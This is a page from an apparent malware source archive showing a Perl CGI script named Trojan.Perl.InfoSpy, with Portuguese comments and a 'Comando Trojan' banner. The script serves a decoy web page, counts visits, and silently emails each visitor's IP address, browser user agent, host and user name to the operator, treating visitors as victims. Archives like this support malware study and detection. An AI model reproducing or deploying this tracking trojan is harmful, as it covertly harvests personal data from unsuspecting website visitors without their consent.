13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-25 16:38:38 +00:00
vxug-MalwareSourceCode/Perl/Trojan.Perl.InfoSpy

60 lines
2.0 KiB
Plaintext
Raw Normal View History

2020-10-10 02:59:39 +00:00
#/usr/bin/perl
################################################
# #
#**********************************************#
#* _ _ *#
#* |\_\\-\ /-//_/| *#
#* | \\-| |-// | *#
#* \ /~\\_____//~\ / *#
#* ` / \ <20> *#
#* | () () | Comando Trojan *#
#* \ ^ / -=- *#
#* ||||| www.comandotrojan.cjb.net *#
#* ||||| *#
#* *#
#**********************************************#
# #
# Vai Abaixo o CGI InfoSpy by iradium #
# #
# Por Favor Preserve estas Linhas #
# #
# chmod 755 #
# #
################################################
print "Content-type: text/html\n\n";
$c = "contador.txt";
#Nome do .txt log
$mailprog = "/usr/sbin/sendmail -t";
#Preste Aten<65><6E>o o real caminho do email no seu server
$emailadm = "seu_email\@seu_site.com.br;
#Deixe o \ no email
$vitima = "lamer_entrou@se_fudeu.com";
#Deixe como estar
#Lembrar de fazer um dom<6F>nio tipo www.entrem.cjb.net e por index.cgi
print <<EOF;
+++ Coloque aqui o html fict<63>cio para ser exibido +++
EOF
open (N, "$c");
$n = <N>;
close (N);
$n++;
open (NE, ">$c");
print NE "$n";
close (NE);
open (MAIL, "|$mailprog") || print "Can't open $mailprog
.\n";
print MAIL "To: $vitima \n";
print MAIL "From: $emailadm\n";
print MAIL "Subject: Visita\n\n";
print MAIL "$ENV{'REMOTE_ADDR'} \n $ENV{'HTTP_USER_AGENT'} \n $ENV{'REMOTE_HOST'} \n $ENV{'REMOTE_USER'} $n\n\n ";
close MAIL;
#FIM DO ARQUIVO